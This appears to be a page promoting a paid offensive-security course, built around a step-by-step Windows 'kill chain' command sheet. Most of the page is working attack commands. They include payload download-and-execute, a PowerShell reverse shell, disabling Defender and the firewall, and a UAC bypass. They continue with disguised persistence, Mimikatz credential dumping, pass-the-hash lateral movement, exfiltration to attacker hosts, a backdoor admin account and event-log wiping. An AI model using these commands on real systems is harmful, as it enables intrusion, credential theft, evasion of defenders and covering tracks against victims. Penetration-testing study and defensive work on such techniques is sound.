RESOURCES // FULL COURSE ACCESS

All course modules are free for self-learning. Tools and source code are paywalled. Study the theory, build the tools, understand the tradecraft.

// COURSE MODULES

22 MODULES — ZERO TO OPERATOR

Modules 00-21 are free for self-study. Tools, source code, and private repos require purchase. Click any module to start learning.
// MENTOR LESSONS

SUPPLEMENTARY MATERIAL — FROM THE FIELD

These documents are compiled from operational conversations with experienced practitioners. They represent real-world tradecraft, not sanitized theory.
// TOOLS

WORKING TOOLS — TESTED ON LIVE AV

Tools are paywalled ($497 AUD full bundle). Public repos are free. Private repos require purchase.
// KILL CHAIN REFERENCE

ATTACK SEQUENCE — STEP BY STEP

"You should have your notes organized with commands, you shouldn't memorize." — mentor. Follow the kill chain: Recon → Access → Evasion → Execution → Privesc → Persist → Creds → Lateral → Exfil → Impact.

PHASE 1: RECON — KNOW THE TARGET

# Identity & privileges
whoami && whoami /groups && whoami /priv

# System info (one-liner)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Network recon
ipconfig /all && route print && netstat -ano

# Running processes & services
tasklist /svc && sc query | findstr SERVICE_NAME

# Check for weak service permissions
sc qc <service_name>
accesschk.exe -uwcqv "Authenticated Users" *

# Defender status check
powershell -c "Get-MpComputerStatus | Select RealTimeProtectionEnabled, IsTamperProtected"

PHASE 2: INITIAL ACCESS — GET CODE EXECUTION

# Download & execute (IEX)
powershell -w hidden -c "iex(iwr http://VPS/payload.ps1)"

# HTA execution (phishing)
mshta http://VPS:8080/payload.hta

# Certutil download (stealthy - trusted MS binary)
certutil -urlcache -split -f http://VPS/payload.exe %TEMP%\svc.exe && %TEMP%\svc.exe

# One-liner reverse shell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('IP',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$s.Write(([Text.Encoding]::ASCII).GetBytes($o),0,$o.Length)}"

PHASE 3: EVASION — BYPASS DEFENSES

# Add Defender exclusions (ADMIN - works with Tamper Protection ON)
Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:APPDATA

# Verify exclusions
(Get-MpPreference).ExclusionPath

# Disable script scanning (ADMIN)
Set-MpPreference -DisableScriptScanning $true

# Disable real-time monitoring (ADMIN - may trigger alert)
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable firewall (ADMIN)
netsh advfirewall set allprofiles state off

PHASE 4: EXECUTION — RUN YOUR PAYLOAD

# Execute from excluded path (after adding exclusions)
iwr http://VPS/deployer.exe -OutFile $env:TEMP\svc.exe; & $env:TEMP\svc.exe

# UAC bypass + execute (fodhelper)
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force; Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(Default)" -Value "cmd /c $env:TEMP\payload.exe"; Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""; Start-Process fodhelper.exe

# Request UAC elevation (social engineering)
Start-Process powershell -Verb RunAs -ArgumentList "-ep bypass -c iex(iwr http://VPS/payload.ps1)"

PHASE 5: PRIVILEGE ESCALATION — CLIMB THE LADDER

# Automated enumeration
powershell -ep bypass -c "IEX(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1); Invoke-AllChecks"

# ADMIN → SYSTEM via scheduled task (RECOMMENDED - works over remote)
schtasks /create /tn SvcUpd /tr "$env:TEMP\svc.exe" /sc once /st 00:00 /ru SYSTEM /rl HIGHEST /f; schtasks /run /tn SvcUpd; schtasks /delete /tn SvcUpd /f

# Exploit SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd
RoguePotato.exe -r 127.0.0.1 -e "cmd.exe" -l 9999

# Check for AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

PHASE 6: PERSISTENCE — SAVE EVERY RUNG

# USER level: Registry Run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WinSecurity /t REG_SZ /d "$env:APPDATA\svc.exe" /f

# ADMIN level: Scheduled task (onlogon)
schtasks /create /tn WinUpdate /tr "$env:APPDATA\svc.exe" /sc onlogon /ru SYSTEM /rl HIGHEST /f

# SYSTEM level: Service
sc create WinDefendSvc binPath= "C:\ProgramData\svc.exe" start= auto

# SSH server (legitimate, hard to detect)
Add-WindowsCapability -Online -Name OpenSSH.Server; Start-Service sshd; Set-Service -Name sshd -StartupType Automatic

PHASE 7: CREDENTIAL ACCESS — HARVEST CREDS

# Mimikatz one-liner
powershell -ep bypass -c "IEX(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds"

# SAM/SYSTEM dump (for offline cracking)
reg save HKLM\SAM sam.hiv; reg save HKLM\SYSTEM system.hiv

# Find passwords in files
findstr /si "password=" *.txt *.ini *.config *.xml

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear

PHASE 8: LATERAL MOVEMENT — SPREAD

# PSExec (requires admin creds)
psexec \\TARGET -u DOMAIN\user -p password cmd

# WMI remote execution
wmic /node:TARGET /user:DOMAIN\user /password:pass process call create "cmd /c payload.exe"

# PowerShell remoting
Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user

# Pass-the-Hash with Mimikatz
sekurlsa::pth /user:Administrator /domain:TARGET /ntlm:HASH /run:cmd

PHASE 9: EXFILTRATION — GET DATA OUT

# Upload via certutil (HTTP)
certutil -urlcache -split -f http://VPS:8080/upload/%COMPUTERNAME%.txt C:\Windows\Temp\x

# PowerShell upload
Invoke-WebRequest -Uri http://VPS:8080/upload -Method POST -InFile C:\data\secrets.zip

# DNS exfil (slow but stealthy)
nslookup $(cat secret.txt | base64).attacker.com

# SMB share (if accessible)
copy C:\data\secrets.zip \\ATTACKER\share\

PHASE 10: IMPACT — DEMONSTRATE COMPROMISE

# Create undeletable files (SYSTEM ownership, locked ACLs)
1..10 | ForEach-Object { $f="C:\Users\victim\Desktop\PWNED$_.txt"; echo PWNED > $f; icacls $f /setowner SYSTEM; icacls $f /inheritance:r; icacls $f /grant SYSTEM:F }

# Add backdoor admin account
net user hacker P@ssw0rd123! /add; net localgroup Administrators hacker /add

# Encrypt files (ransomware demo - AUTHORIZED ONLY)
# Use with caution - only on test systems

# Leave evidence of access (authorized pentest)
echo "COMPROMISED BY [OPERATOR] - $(Get-Date)" > C:\Users\Public\PENTEST_PROOF.txt

CLEANUP — COVER TRACKS

# Remove scheduled tasks
schtasks /delete /tn TaskName /f

# Remove services
sc delete ServiceName

# Remove registry persistence
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v KeyName /f

# Remove files
Remove-Item $env:TEMP\*.exe -Force; Remove-Item $env:TEMP\*.ps1 -Force

# Remove Defender exclusions
Remove-MpPreference -ExclusionPath $env:TEMP

# Clear event logs (SYSTEM required - very noisy)
wevtutil cl Security; wevtutil cl System; wevtutil cl Application